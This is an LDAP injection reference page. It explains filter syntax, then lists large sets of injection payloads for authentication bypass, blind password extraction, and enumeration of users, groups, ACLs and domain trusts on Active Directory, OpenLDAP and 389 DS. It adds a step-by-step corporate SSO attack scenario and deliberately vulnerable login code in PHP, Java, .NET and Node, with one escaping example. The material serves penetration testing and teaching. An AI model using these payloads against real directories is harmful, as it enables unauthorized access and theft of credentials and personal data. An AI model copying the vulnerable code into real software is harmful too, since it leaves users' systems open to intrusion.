LDAP injection
Understanding LDAP Injection
What is LDAP Injection?
LDAP (Lightweight Directory Access Protocol) injection is a security vulnerability that occurs when user-supplied input is incorporated into LDAP statements without proper validation or sanitization. This allows attackers to manipulate LDAP queries to access unauthorized information, bypass authentication, or modify directory data.
Vulnerable Code Example
// PHP vulnerable LDAP authentication
// Assumes $ldap_conn (from ldap_connect/ldap_bind) and $base_dn are set up earlier
$username = $_POST['username'];
$password = $_POST['password'];
// User input is concatenated straight into the filter: this is the injection point
$ldap_filter = "(&(uid=$username)(userPassword=$password))";
$result = ldap_search($ldap_conn, $base_dn, $ldap_filter);
if (ldap_count_entries($ldap_conn, $result) > 0) {
    echo "Authentication successful";
} else {
    echo "Authentication failed";
}
Normal Request:
Username: john
Password: secret123
Filter: (&(uid=john)(userPassword=secret123))
Malicious Request:
Username: admin)(&(uid=admin
Password: anything
Filter: (&(uid=admin)(&(uid=admin)(userPassword=anything))
How LDAP Injection Works
LDAP injection exploits the way applications construct LDAP search filters and bind operations. When user input is directly concatenated into LDAP queries without proper escaping, attackers can inject LDAP special characters to modify the query logic.
LDAP Query Structure
Basic LDAP Filter Syntax:
(attribute=value) - Equality filter
(!(attribute=value)) - Negation filter
(&(filter1)(filter2)) - AND operation
(|(filter1)(filter2)) - OR operation
(attribute=value*) - Wildcard matching
(attribute>=value) - Greater than or equal
(attribute<=value) - Less than or equal
Impact and Consequences
Authentication Bypass - Access without valid credentials
Information Disclosure - Enumeration of directory data
Privilege Escalation - Access to administrative accounts
Data Modification - Unauthorized changes to directory entries
Denial of Service - Malformed queries causing service disruption
LDAP Special Characters and Metacharacters
Understanding LDAP special characters is crucial for both exploitation and defense:
Filter Metacharacters
( - Start of filter
) - End of filter
& - AND operator
| - OR operator
! - NOT operator
* - Wildcard character
\ - Escape character
= - Equality operator
>= - Greater than or equal
<= - Less than or equal
~= - Approximate match
Distinguished Name (DN) Special Characters
, - Separator between RDN components
= - Separator between attribute and value
+ - Multi-valued RDN separator
" - Quoted string delimiter
\ - Escape character
; - Alternative separator (deprecated)
< - Less than symbol
> - Greater than symbol
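The defence these metacharacter tables imply, as an added example that is not part of the original page: an RFC 4515 escaper for filter values, the page's vulnerable login filter beside an escaped version, and a small hand-rolled filter parser (not a library API) that shows what the directory receives in each case. All function names are this example's own.

```javascript
// Added example: RFC 4515 escaping for LDAP filter values, the page's
// vulnerable login filter beside a hardened one, and a small filter parser
// (hand-rolled, not a library API) that shows what the server receives.

// Escape a value for use inside a filter assertion. RFC 4515 requires
// '\', '*', '(', ')' and NUL to be written as \XX; bytes >= 0x80 are
// escaped too so the result is plain ASCII.
function escapeFilterValue(value) {
  let out = '';
  for (const b of Buffer.from(String(value), 'utf8')) {
    const special = b === 0x5c || b === 0x2a || b === 0x28 || b === 0x29 || b === 0x00 || b >= 0x80;
    out += special ? '\\' + b.toString(16).padStart(2, '0') : String.fromCharCode(b);
  }
  return out;
}

// The vulnerable pattern from the page: raw string interpolation.
function unsafeLoginFilter(username, password) {
  return `(&(uid=${username})(userPassword=${password}))`;
}

// Hardened version: every user-controlled value is escaped before
// interpolation, so it can only ever be compared as a literal string.
function safeLoginFilter(username, password) {
  return `(&(uid=${escapeFilterValue(username)})(userPassword=${escapeFilterValue(password)}))`;
}

// Recursive-descent parser for the filter grammar listed on this page
// (=, >=, <=, ~=, and the &, |, ! combinators). It returns the AST of the
// first complete filter plus any trailing text, and throws on malformed
// input, which is what a strict server-side parser does with most injected
// filters.
function parseFilter(text) {
  let pos = 0;
  function node() {
    if (text[pos] !== '(') throw new Error(`expected "(" at ${pos}`);
    pos++;
    const op = text[pos];
    if (op === '&' || op === '|' || op === '!') {
      pos++;
      const children = [];
      while (text[pos] === '(') children.push(node());
      if (text[pos] !== ')') throw new Error(`expected ")" at ${pos}`);
      pos++;
      return { op, children };
    }
    const m = /^([A-Za-z][A-Za-z0-9.;-]*)(>=|<=|~=|=)([^()]*)\)/.exec(text.slice(pos));
    if (!m) throw new Error(`malformed simple filter at ${pos}`);
    pos += m[0].length;
    return { op: m[2], attribute: m[1], value: m[3] };
  }
  const ast = node();
  return { ast, rest: text.slice(pos) };
}

// Non-throwing wrapper: ok is true only for a single well-formed filter.
function analyzeFilter(text) {
  try {
    const { ast, rest } = parseFilter(text);
    return { ok: rest === '', ast, rest, error: rest === '' ? null : 'trailing text after filter' };
  } catch (e) {
    return { ok: false, ast: null, rest: '', error: e.message };
  }
}

// The page's headline payload: with raw interpolation the filter is no longer
// the two-condition AND the developer wrote (here it is not even well formed);
// with escaping it stays a literal comparison. The wildcard payload "*" shows
// the other failure mode: a well-formed filter whose meaning has changed.
const injected = 'admin)(&(uid=admin';
console.log(analyzeFilter(unsafeLoginFilter(injected, 'anything')).error);
console.log(analyzeFilter(safeLoginFilter(injected, 'anything')).ast.children[0].value);
console.log(analyzeFilter(unsafeLoginFilter('*', '*')).ast.children[0].value);
console.log(analyzeFilter(safeLoginFilter('*', '*')).ast.children[0].value);
```

In the frameworks this page covers the equivalent built-ins are PHP's ldap_escape() with LDAP_ESCAPE_FILTER, Spring LDAP's LdapEncoder.filterEncode() and ldapjs filter objects such as filters.EqualityFilter; prefer those over a hand-rolled escaper in production code.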
Detection Methodology
Identifying Vulnerable Parameters
Common LDAP Integration Points
Authentication Systems:
Login forms
Password reset mechanisms
User registration
Single Sign-On (SSO) implementations
Multi-factor authentication
User Management:
User search functionality
Profile management
Group membership queries
Permission verification
User enumeration features
Application Integration:
Employee directories
Contact lists
Organizational charts
Access control systems
Email address lookups
Vulnerable Function Patterns
PHP LDAP Functions:
ldap_search()
ldap_list()
ldap_read()
ldap_bind()
ldap_compare()
ldap_modify()
ldap_add()
ldap_delete()
Java LDAP Functions:
DirContext.search()
LdapContext.search()
InitialDirContext.search()
LdapTemplate.search()
LdapTemplate.authenticate()
ASP.NET LDAP Functions:
DirectorySearcher.Filter
DirectoryEntry.Path
PrincipalSearcher.QueryFilter
DirectoryServices.Search()
Basic Detection Techniques
Authentication Bypass Testing
AND Logic Bypass:
# Test various AND bypass techniques
username: admin)(&(uid=admin
password: anything
username: admin))%00
password: anything
username: admin)|(uid=*
password: anything
OR Logic Injection:
# Inject OR conditions
username: *)(uid=*)|(uid=*
password: anything
username: admin)|(|(uid=admin
password: anything
username: *)(|(objectClass=*
password: anything
Wildcard Injection:
# Use wildcards for authentication bypass
username: *
password: *
username: admin*
password: *
username: a*
password: *
Boolean-Based Testing
True/False Conditions:
# Test boolean responses
username: admin)(&(1=1
password: anything
username: admin)(&(1=2
password: anything
# Check response differences
username: admin)(&(objectClass=person
password: anything
username: admin)(&(objectClass=invalidclass
password: anything
Existence Testing:
# Test attribute existence
username: admin)(&(uid=*
password: anything
username: admin)(&(mail=*
password: anything
username: admin)(&(telephoneNumber=*
password: anything
Error-Based Detection
Syntax Error Injection:
# Generate LDAP syntax errors
username: admin)(
password: anything
username: admin))
password: anything
username: admin)(&
password: anything
username: admin)(&(
password: anything
Invalid Filter Testing:
# Invalid filter constructions
username: admin)(&(invalid
password: anything
username: admin)(&(=value
password: anything
username: admin)(&(attr=
password: anything
Advanced Detection Techniques
Blind LDAP Injection
Time-Based Detection:
# Time-based testing (server-dependent)
username: admin)(&(cn=admin*)(cn=a*
password: anything
username: admin)(&(cn=admin*)(cn=b*
password: anything
# Character-by-character enumeration
username: admin)(&(userPassword=a*
password: anything
username: admin)(&(userPassword=b*
password: anything
Content-Length Based:
# Response size analysis
username: *
password: anything
username: a*
password: anything
username: admin*
password: anything
# Monitor response sizes for information leakage
Attribute Enumeration
Common Attribute Testing:
# Test for standard LDAP attributes
username: admin)(&(mail=*
password: anything
username: admin)(&(telephoneNumber=*
password: anything
username: admin)(&(department=*
password: anything
username: admin)(&(title=*
password: anything
username: admin)(&(employeeNumber=*
password: anything
Custom Attribute Discovery:
# Application-specific attributes
username: admin)(&(customField=*
password: anything
username: admin)(&(permissions=*
password: anything
username: admin)(&(role=*
password: anything
username: admin)(&(accessLevel=*
password: anything
Authentication Bypass Techniques
AND Logic Manipulation
Basic AND Bypass
Filter Structure Manipulation:
# Original filter: (&(uid=username)(userPassword=password))
# Bypass technique 1
username: admin)(&(uid=admin
password: anything
# Result: (&(uid=admin)(&(uid=admin)(userPassword=anything))
# Bypass technique 2
username: admin))%00
password: anything
# Result: (&(uid=admin))%00)(userPassword=anything))
# Bypass technique 3
username: admin)(&(objectClass=*
password: anything
# Result: (&(uid=admin)(&(objectClass=*)(userPassword=anything))
Comment-Based Bypass:
# Using null byte or comment injection
username: admin%00
password: anything
username: admin#
password: anything
# Some implementations may ignore content after null byte
Advanced AND Manipulation
Nested Filter Injection:
# Complex nested filter manipulation
username: admin)(&(|(uid=admin)(uid=root
password: anything
# Result: (&(uid=admin)(&(|(uid=admin)(uid=root)(userPassword=anything))
# Multiple condition injection
username: admin)(&(uid=admin)(&(objectClass=person
password: anything
# Result: (&(uid=admin)(&(uid=admin)(&(objectClass=person)(userPassword=anything))
OR Logic Exploitation
Basic OR Injection
Always True Conditions:
# OR with wildcard (always true)
username: *)(uid=*)|(uid=*
password: anything
# Result: (&(uid=*)(uid=*)|(uid=*)(userPassword=anything))
# OR with object class
username: admin)|(objectClass=*
password: anything
# Result: (&(uid=admin)|(objectClass=*)(userPassword=anything))
# OR with always true condition
username: admin)|(uid=*
password: anything
# Result: (&(uid=admin)|(uid=*)(userPassword=anything))
Multi-User Bypass
Targeting Multiple Accounts:
# Target multiple administrative accounts
username: admin)|(uid=administrator)|(uid=root
password: anything
# Target any privileged user
username: admin)|(memberOf=cn=admins,ou=groups,dc=example,dc=com
password: anything
# Target any user with email
username: admin)|(mail=*
password: anything
Wildcard Exploitation
Universal Wildcards
Complete Wildcard Bypass:
# Universal access attempt
username: *
password: *
# Single character wildcard
username: ?
password: ?
# Partial wildcard matching
username: a*
password: *
username: admin*
password: *
Targeted Wildcard Attacks
Specific User Targeting:
# Target users starting with 'admin'
username: admin*
password: *
# Target specific user patterns
username: service*
password: *
username: test*
password: *
# Target by department
username: *)(&(department=IT*
password: anything
Information Disclosure Techniques
User Enumeration
Username Discovery
Alphabetic Enumeration:
# Enumerate usernames by starting letter
username: a*
username: b*
username: c*
# ... continue through alphabet
# Two-character enumeration
username: aa*
username: ab*
username: ac*
# ... more granular enumeration
Pattern-Based Discovery:
# Common username patterns
username: admin*
username: user*
username: test*
username: service*
username: guest*
# Email-based usernames
username: *.smith*
username: *.john*
username: *.admin*
Account Information Extraction
Personal Information:
# Extract user details
username: admin)(&(mail=*@company.com*
password: anything
username: admin)(&(telephoneNumber=555*
password: anything
username: admin)(&(cn=John*
password: anything
username: admin)(&(sn=Smith*
password: anything
Organizational Information:
# Department enumeration
username: admin)(&(department=*
password: anything
username: admin)(&(ou=*
password: anything
# Job title extraction
username: admin)(&(title=*Manager*
password: anything
username: admin)(&(title=*Director*
password: anything
Group and Permission Discovery
Group Membership Enumeration
Administrative Groups:
# Discover admin group members
username: admin)(&(memberOf=*admin*
password: anything
username: admin)(&(memberOf=*root*
password: anything
username: admin)(&(memberOf=*wheel*
password: anything
# Enumerate group DNs
username: admin)(&(memberOf=cn=*,ou=groups*
password: anything
Department Groups:
# Department-based groups
username: admin)(&(memberOf=*IT*
password: anything
username: admin)(&(memberOf=*HR*
password: anything
username: admin)(&(memberOf=*Finance*
password: anything
username: admin)(&(memberOf=*Security*
password: anything
Permission Structure Discovery
Access Control Attributes:
# Permission-related attributes
username: admin)(&(accessRights=*
password: anything
username: admin)(&(permissions=*
password: anything
username: admin)(&(role=*
password: anything
username: admin)(&(privilegeLevel=*
password: anything
Security Clearance:
# Security level enumeration
username: admin)(&(securityClearance=*
password: anything
username: admin)(&(accessLevel=*
password: anything
username: admin)(&(classification=*
password: anything
Application-Specific LDAP Injection
Authentication Systems
Single Sign-On (SSO) Bypass
SAML-Based SSO:
# SAML assertion manipulation
username: admin)(&(uid=admin)(!(disabled=*
password: anything
# NameID injection
username: admin@company.com)(&(mail=admin@company.com*
password: anything
# Attribute-based bypass
username: admin)(&(role=administrator*
password: anything
OAuth/OpenID Integration:
# OAuth attribute injection
username: admin)(&(oauth_id=*
password: anything
# Social media integration bypass
username: admin)(&(facebook_id=*
password: anything
username: admin)(&(google_id=*
password: anything
Multi-Factor Authentication
MFA Bypass Attempts:
# Bypass MFA requirements
username: admin)(&(mfaEnabled=false*
password: anything
username: admin)(&(!(mfaRequired=*
password: anything
# Token-based MFA bypass
username: admin)(&(mfaToken=*
password: anything
Web Application Integration
User Search Functionality
Directory Search Injection:
<!-- Search form injection -->
<form action="/search" method="POST">
    <input name="searchTerm" value="smith)(&(uid=admin*" />
    <input name="department" value="*" />
</form>
Advanced Search Filters:
# Multi-field search injection
searchTerm: *)(&(department=IT)(&(title=Manager*
location: *
department: *
# Boolean search injection
searchTerm: smith)|(|(cn=admin*
criteria: name
Profile Management
Profile Update Injection:
# Profile field injection
firstName: John)(&(uid=admin*
lastName: *
email: user@company.com
# Description field injection
description: Employee)(&(role=administrator*
title: *
department: *
Contact Information:
# Phone number injection
phone: 555-1234)(&(mobile=*
address: *
zipcode: *
# Email injection
email: user@company.com)(&(mail=admin@*
alternateEmail: *
Enterprise Applications
Employee Directory Systems
Employee Lookup Injection:
# Employee ID injection
employeeId: 12345)(&(manager=*admin*
name: *
department: *
# Badge number injection
badgeNumber: B001)(&(accessLevel=*
building: *
floor: *
Organizational Chart:
# Manager hierarchy injection
manager: Smith)(&(title=*Director*
subordinate: *
reporting: *
# Team structure injection
team: Development)(&(lead=*
project: *
role: *
Customer Relationship Management
Customer Search Injection:
# Customer ID injection
customerId: CUST001)(&(status=VIP*
customerName: *
tier: *
# Account lookup injection
accountNumber: ACC123)(&(creditLimit=*
status: *
type: *
Advanced LDAP Injection Techniques
Blind LDAP Injection Exploitation
Character-by-Character Extraction
Password Enumeration:
# Extract password character by character
# Position 1
username: admin)(&(userPassword=a*
username: admin)(&(userPassword=b*
username: admin)(&(userPassword=c*
# ... continue until response indicates match
# Position 2 (assuming first character is 'p')
username: admin)(&(userPassword=pa*
username: admin)(&(userPassword=pb*
username: admin)(&(userPassword=pc*
# ... continue enumeration
Attribute Value Extraction:
# Extract email address
username: admin)(&(mail=a*
username: admin)(&(mail=admin@*
username: admin)(&(mail=admin@company*
username: admin)(&(mail=admin@company.com*
# Extract phone number
username: admin)(&(telephoneNumber=555*
username: admin)(&(telephoneNumber=555-1*
username: admin)(&(telephoneNumber=555-12*
Time-Based Extraction
Response Time Analysis:
# Large result set for timing
username: admin)(&(|(uid=a*)(uid=b*)(uid=c*
# vs small result set
username: admin)(&(uid=nonexistent*
# Complex query timing
username: admin)(&(memberOf=cn=admins,ou=groups,dc=example,dc=com*
# vs simple query
username: admin)(&(uid=admin*
Content-Length Analysis
Response Size Comparison:
# Different response sizes for valid vs invalid
username: * # Large response (all users)
username: admin* # Medium response (admin users)
username: adminnonexistent* # Small response (no users)
# Incremental size analysis
username: a* # Size for users starting with 'a'
username: ad* # Size for users starting with 'ad'
username: adm* # Size for users starting with 'adm'
Filter Injection Techniques
Complex Boolean Logic
Nested AND/OR Combinations:
# Complex nested logic
username: admin)(&(|(uid=admin)(uid=root))(&(objectClass=person*
password: anything
# Multiple condition chaining
username: admin)(&(uid=admin)(&(!(disabled=true))(&(active=true*
password: anything
# Conditional attribute testing
username: admin)(&(|(department=IT)(department=Security))(&(role=admin*
password: anything
Approximation Attacks
Fuzzy Matching Exploitation:
# Approximate match operator (~=)
username: admin)(&(cn~=administrator*
password: anything
username: admin)(&(mail~=admin@company*
password: anything
# Phonetic matching (if supported)
username: admin)(&(sn~=smith*
password: anything
Range-Based Attacks
Numeric Range Exploitation:
# Employee ID ranges
username: admin)(&(employeeId>=1000*
password: anything
username: admin)(&(employeeId<=9999*
password: anything
# Date-based ranges
username: admin)(&(createTimestamp>=20230101000000Z*
password: anything
username: admin)(&(modifyTimestamp<=20231231235959Z*
password: anything
Protocol-Specific Techniques
LDAPS (LDAP over SSL/TLS)
Certificate-Based Attacks:
# Certificate subject injection
username: admin)(&(userCertificate;binary=*
password: anything
# Certificate serial number
username: admin)(&(certificateSerialNumber=*
password: anything
LDAP Referrals
Referral Manipulation:
# Referral URL injection
username: admin)(&(ref=ldap://malicious.server/*
password: anything
# Cross-domain referral
username: admin)(&(ref=ldap://target.domain/dc=target,dc=domain*
password: anything
Extended Operations
Extended Request Injection:
# Password modify extended operation
username: admin)(&(pwdChangedTime=*
password: anything
# Start TLS injection
username: admin)(&(supportedExtension=1.3.6.1.4.1.1466.20037*
password: anything
Platform-Specific LDAP Injection
Active Directory Exploitation
Active Directory Specific Attributes
AD-Specific Enumeration:
# samAccountName injection
username: admin)(&(samAccountName=administrator*
password: anything
# userPrincipalName injection
username: admin)(&(userPrincipalName=admin@domain.com*
password: anything
# distinguishedName injection
username: admin)(&(distinguishedName=CN=Administrator,CN=Users,DC=domain,DC=com*
password: anything
Security Identifier (SID) Attacks:
# objectSid enumeration
username: admin)(&(objectSid=S-1-5-21-*500
password: anything
# Well-known SID injection
username: admin)(&(objectSid=S-1-5-32-544* # Local Administrators
password: anything
username: admin)(&(objectSid=S-1-5-32-548* # Account Operators
password: anything
Group Policy and Permissions
Group Policy Object (GPO) Injection:
# GPO link discovery
username: admin)(&(gPLink=*
password: anything
# Group policy enumeration
username: admin)(&(objectClass=groupPolicyContainer*
password: anything
# GPO permissions
username: admin)(&(nTSecurityDescriptor=*
password: anything
Access Control List (ACL) Exploitation:
# ACL enumeration
username: admin)(&(nTSecurityDescriptor=*ADMIN*
password: anything
# Permission inheritance
username: admin)(&(inheritanceFlags=*
password: anything
# Extended rights
username: admin)(&(rightsGuid=*
password: anything
Domain Trust Relationships
Trust Enumeration:
# Trusted domain discovery
username: admin)(&(trustPartner=*
password: anything
# Trust direction
username: admin)(&(trustDirection=*
password: anything
# Cross-domain user enumeration
username: admin)(&(userPrincipalName=*@trusted.domain*
password: anything
OpenLDAP Exploitation
OpenLDAP Schema Exploitation
Schema Discovery:
# Attribute type enumeration
username: admin)(&(attributeTypes=*
password: anything
# Object class discovery
username: admin)(&(objectClasses=*
password: anything
# Supported extensions
username: admin)(&(supportedExtension=*
password: anything
Access Control Information (ACI):
# ACI enumeration
username: admin)(&(aci=*
password: anything
# Access control policy
username: admin)(&(aclRights=*
password: anything
# Permission targets
username: admin)(&(targetattr=*
password: anything
OpenLDAP Overlays
ppolicy Overlay Exploitation:
# Password policy attributes
username: admin)(&(pwdPolicySubentry=*
password: anything
# Password history
username: admin)(&(pwdHistory=*
password: anything
# Account lockout status
username: admin)(&(pwdAccountLockedTime=*
password: anything
memberof Overlay:
# Dynamic group membership
username: admin)(&(memberOf=*
password: anything
# Reverse group lookup
username: admin)(&(member=*admin*
password: anything
389 Directory Server
389 DS Specific Features
Role-Based Access Control:
# Role enumeration
username: admin)(&(nsRole=*
password: anything
# Role definition
username: admin)(&(objectClass=nsRoleDefinition*
password: anything
# Managed roles
username: admin)(&(objectClass=nsManagedRoleDefinition*
password: anything
Account Policy:
# Account inactivation
username: admin)(&(nsAccountLock=*
password: anything
# Password syntax checking
username: admin)(&(passwordCheckSyntax=*
password: anything
# Account policy state
username: admin)(&(accountUnlockTime=*
password: anything
Class of Service (CoS)
CoS Template Discovery:
# CoS template enumeration
username: admin)(&(objectClass=cosTemplate*
password: anything
# CoS definition
username: admin)(&(objectClass=cosSuperDefinition*
password: anything
# Indirect CoS
username: admin)(&(cosIndirectSpecifier=*
password: anything
Web Application Framework Integration
PHP LDAP Integration
PHP-Specific Vulnerabilities
Common PHP LDAP Patterns:
<?php
// Vulnerable authentication function
function authenticate($username, $password) {
    $ldap_conn = ldap_connect("ldap://ldap.company.com");
    // Vulnerable filter construction
    $filter = "(&(uid=$username)(userPassword=$password))";
    $search = ldap_search($ldap_conn, "dc=company,dc=com", $filter);
    return ldap_count_entries($ldap_conn, $search) > 0;
}

// Vulnerable user search
function searchUsers($searchTerm) {
    $ldap_conn = ldap_connect("ldap://ldap.company.com");
    // Vulnerable search filter
    $filter = "(|(cn=*$searchTerm*)(mail=*$searchTerm*))";
    $search = ldap_search($ldap_conn, "ou=users,dc=company,dc=com", $filter);
    return ldap_get_entries($ldap_conn, $search);
}
?>
PHP LDAP Injection Payloads:
# PHP-specific authentication bypass
username: admin)(%00(&(uid=admin
password: anything
# PHP null byte injection
username: admin%00)(&(uid=admin
password: anything
# PHP comment injection
username: admin#)(&(uid=admin
password: anything
PHP Framework Integration
Laravel LDAP Integration:
<?php
// Vulnerable Laravel LDAP authentication
use Adldap\Laravel\Facades\Adldap;
use App\Http\Controllers\Controller;
use Illuminate\Http\Request;

class AuthController extends Controller {
    public function authenticate(Request $request) {
        $username = $request->input('username');
        $password = $request->input('password');
        // Vulnerable LDAP query: raw filter built directly from request input
        $user = Adldap::search()
            ->whereRaw("(&(samAccountName=$username)(userPassword=$password))")
            ->first();
        return $user ? 'success' : 'failed';
    }
}
?>
Java/Spring LDAP Integration
Spring LDAP Vulnerabilities
Spring LDAP Template:
// Vulnerable Spring LDAP authentication
import java.util.List;
import javax.naming.NamingException;
import javax.naming.directory.Attributes;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.ldap.core.AttributesMapper;
import org.springframework.ldap.core.LdapTemplate;
import org.springframework.stereotype.Service;

@Service
public class LdapAuthenticationService {
    @Autowired
    private LdapTemplate ldapTemplate;

    public boolean authenticate(String username, String password) {
        // Vulnerable filter construction: raw concatenation, no escaping
        String filter = "(&(uid=" + username + ")(userPassword=" + password + "))";
        List<String> results = ldapTemplate.search(
            "ou=users",
            filter,
            new AttributesMapper<String>() {
                public String mapFromAttributes(Attributes attrs) throws NamingException {
                    // get() returns the attribute value rather than "uid: value"
                    return (String) attrs.get("uid").get();
                }
            }
        );
        return !results.isEmpty();
    }
}
Spring Security LDAP:
// Vulnerable Spring Security LDAP configuration
import org.springframework.context.annotation.Configuration;
import org.springframework.security.config.annotation.authentication.builders.AuthenticationManagerBuilder;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;

@Configuration
@EnableWebSecurity
public class SecurityConfig extends WebSecurityConfigurerAdapter {
    @Override
    protected void configure(AuthenticationManagerBuilder auth) throws Exception {
        auth.ldapAuthentication()
            .userSearchBase("ou=users")
            // Vulnerable user search filter
            .userSearchFilter("(uid={0})")
            .groupSearchBase("ou=groups")
            // Vulnerable group search filter
            .groupSearchFilter("(member={0})")
            .contextSource()
                .url("ldap://ldap.company.com:389/dc=company,dc=com");
    }
}
Java Enterprise Integration
JNDI LDAP Injection:
// Vulnerable JNDI LDAP lookup
import java.util.Hashtable;
import javax.naming.Context;
import javax.naming.NamingEnumeration;
import javax.naming.NamingException;
import javax.naming.directory.InitialDirContext;
import javax.naming.directory.SearchControls;
import javax.naming.directory.SearchResult;

public class UserService {
    public User findUser(String username) {
        // JNDI needs a provider URL and factory; without them the context cannot connect
        Hashtable<String, String> env = new Hashtable<>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
        env.put(Context.PROVIDER_URL, "ldap://ldap.company.com:389");
        InitialDirContext ctx = null;
        try {
            ctx = new InitialDirContext(env);
            // Vulnerable search filter: username is concatenated unescaped
            String filter = "(&(objectClass=person)(uid=" + username + "))";
            SearchControls controls = new SearchControls();
            controls.setSearchScope(SearchControls.SUBTREE_SCOPE);
            NamingEnumeration<SearchResult> results = ctx.search(
                "ou=users,dc=company,dc=com",
                filter,
                controls
            );
            // Process results... (processResults is defined elsewhere in the application)
            return processResults(results);
        } catch (NamingException e) {
            throw new RuntimeException("LDAP search failed", e);
        } finally {
            if (ctx != null) {
                try { ctx.close(); } catch (NamingException ignored) { }
            }
        }
    }
}
.NET/ASP.NET LDAP Integration
.NET DirectoryServices Vulnerabilities
DirectorySearcher Injection:
// Vulnerable .NET LDAP authentication
using System;
using System.DirectoryServices;

public class LdapAuthenticator {
    public bool Authenticate(string username, string password) {
        try {
            using (DirectoryEntry entry = new DirectoryEntry()) {
                entry.Path = "LDAP://ldap.company.com/dc=company,dc=com";
                using (DirectorySearcher searcher = new DirectorySearcher(entry)) {
                    // Vulnerable filter construction: interpolated without escaping
                    searcher.Filter = $"(&(uid={username})(userPassword={password}))";
                    SearchResult result = searcher.FindOne();
                    return result != null;
                }
            }
        } catch (Exception) {
            return false;
        }
    }
}
ASP.NET Identity Integration:
// Vulnerable ASP.NET Identity LDAP provider
using System.DirectoryServices;
using System.Threading.Tasks;
using Microsoft.AspNet.Identity;

public class LdapUserStore : IUserStore<ApplicationUser> {
    // Other IUserStore members omitted; only the lookup that builds a filter is shown
    public async Task<ApplicationUser> FindByNameAsync(string userName) {
        using (DirectoryEntry entry = new DirectoryEntry()) {
            entry.Path = "LDAP://ldap.company.com/dc=company,dc=com";
            using (DirectorySearcher searcher = new DirectorySearcher(entry)) {
                // Vulnerable user search: userName interpolated without escaping
                searcher.Filter = $"(samAccountName={userName})";
                SearchResult result = searcher.FindOne();
                if (result != null) {
                    return MapToApplicationUser(result);
                }
            }
        }
        return null;
    }
}
Node.js LDAP Integration
Node.js LDAP Libraries
ldapjs Vulnerabilities:
// Vulnerable Node.js LDAP authentication
const ldap = require('ldapjs');

function authenticate(username, password, callback) {
  const client = ldap.createClient({
    url: 'ldap://ldap.company.com:389'
  });
  // Vulnerable filter construction: template literal, no escaping
  const filter = `(&(uid=${username})(userPassword=${password}))`;
  const opts = {
    filter: filter,
    scope: 'sub',
    attributes: ['uid', 'cn', 'mail']
  };
  client.search('dc=company,dc=com', opts, (err, res) => {
    if (err) {
      client.unbind();
      return callback(err, false);
    }
    let found = false;
    res.on('searchEntry', (entry) => {
      found = true;
    });
    res.on('end', () => {
      client.unbind();
      callback(null, found);
    });
    res.on('error', (err) => {
      client.unbind();
      callback(err, false);
    });
  });
}

// Vulnerable user search function
function searchUsers(searchTerm, callback) {
  const client = ldap.createClient({
    url: 'ldap://ldap.company.com:389'
  });
  // Vulnerable search filter: searchTerm is interpolated unescaped
  const filter = `(|(cn=*${searchTerm}*)(mail=*${searchTerm}*))`;
  const opts = {
    filter: filter,
    scope: 'sub',
    attributes: ['uid', 'cn', 'mail', 'department']
  };
  client.search('ou=users,dc=company,dc=com', opts, (err, res) => {
    if (err) {
      client.unbind();
      return callback(err, []);
    }
    const results = [];
    res.on('searchEntry', (entry) => {
      results.push(entry.object);
    });
    res.on('end', () => {
      client.unbind();
      callback(null, results);
    });
    res.on('error', (err) => {
      client.unbind();
      callback(err, []);
    });
  });
}
Passport.js LDAP Strategy:
// Vulnerable Passport LDAP strategy
const passport = require('passport');
const LdapStrategy = require('passport-ldapauth');

passport.use(new LdapStrategy({
  server: {
    url: 'ldap://ldap.company.com:389',
    bindDN: 'cn=admin,dc=company,dc=com',
    bindCredentials: 'admin_password',
    searchBase: 'ou=users,dc=company,dc=com',
    // Vulnerable search filter
    searchFilter: '(uid={{username}})', // Should be escaped
    searchAttributes: ['uid', 'cn', 'mail']
  }
}, (user, done) => {
  return done(null, user);
}));
Express.js LDAP Integration
Express Route Vulnerabilities:
// Vulnerable Express.js LDAP endpoints
const express = require('express');
const ldap = require('ldapjs');
const app = express();
// Body parsers so req.body is populated for the login form
app.use(express.urlencoded({ extended: false }));
app.use(express.json());

// Vulnerable login endpoint
app.post('/login', (req, res) => {
  const { username, password } = req.body;
  const client = ldap.createClient({
    url: 'ldap://ldap.company.com:389'
  });
  // Vulnerable filter - direct concatenation
  const filter = `(&(uid=${username})(userPassword=${password}))`;
  client.search('dc=company,dc=com', { filter }, (err, search) => {
    if (err) {
      client.unbind();
      return res.status(500).json({ success: false });
    }
    let authenticated = false;
    search.on('searchEntry', () => {
      authenticated = true;
    });
    search.on('error', () => {
      client.unbind();
      res.status(500).json({ success: false });
    });
    search.on('end', () => {
      client.unbind();
      res.json({ success: authenticated });
    });
  });
});

// Vulnerable user search endpoint
app.get('/users/search', (req, res) => {
  const { query, department } = req.query;
  const client = ldap.createClient({
    url: 'ldap://ldap.company.com:389'
  });
  // Vulnerable multi-parameter filter: both query and department unescaped
  const filter = `(&(|(cn=*${query}*)(mail=*${query}*))(department=${department}))`;
  client.search('ou=users,dc=company,dc=com', { filter }, (err, search) => {
    if (err) {
      client.unbind();
      return res.status(500).json([]);
    }
    const results = [];
    search.on('searchEntry', (entry) => {
      results.push(entry.object);
    });
    search.on('error', () => {
      client.unbind();
      res.status(500).json([]);
    });
    search.on('end', () => {
      client.unbind();
      res.json(results);
    });
  });
});

app.listen(3000);
Real-World Attack Scenarios
Enterprise SSO Bypass
Corporate Authentication System
Scenario: Large Enterprise SSO
# Target: Corporate SSO portal
# Vulnerable parameter: username field in login form
# Step 1: Identify LDAP injection point
POST /sso/authenticate
Content-Type: application/x-www-form-urlencoded
username=testuser&password=testpass
# Step 2: Test for injection
username=testuser)(&(uid=testuser&password=anything
# Step 3: Attempt authentication bypass
username=admin)(&(uid=admin&password=anything
# Step 4: Extract administrative accounts
username=*)(&(memberOf=*admin*&password=anything
# Step 5: Enumerate high-privilege users
username=*)(&(title=*director*&password=anything
username=*)(&(title=*manager*&password=anything
username=*)(&(department=security*&password=anything
Multi-Domain Environment
Cross-Domain Exploitation:
# Target: Multi-domain corporate environment
# Domains: corp.company.com, dev.company.com, prod.company.com
# Enumerate domains
username=admin)(&(userPrincipalName=*@corp.company.com*
username=admin)(&(userPrincipalName=*@dev.company.com*
username=admin)(&(userPrincipalName=*@prod.company.com*
# Cross-domain privilege escalation
username=admin)(&(memberOf=*,DC=corp,DC=company,DC=com*
username=admin)(&(memberOf=*,DC=dev,DC=company,DC=com*
# Service account discovery
username=svc*)(&(servicePrincipalName=*
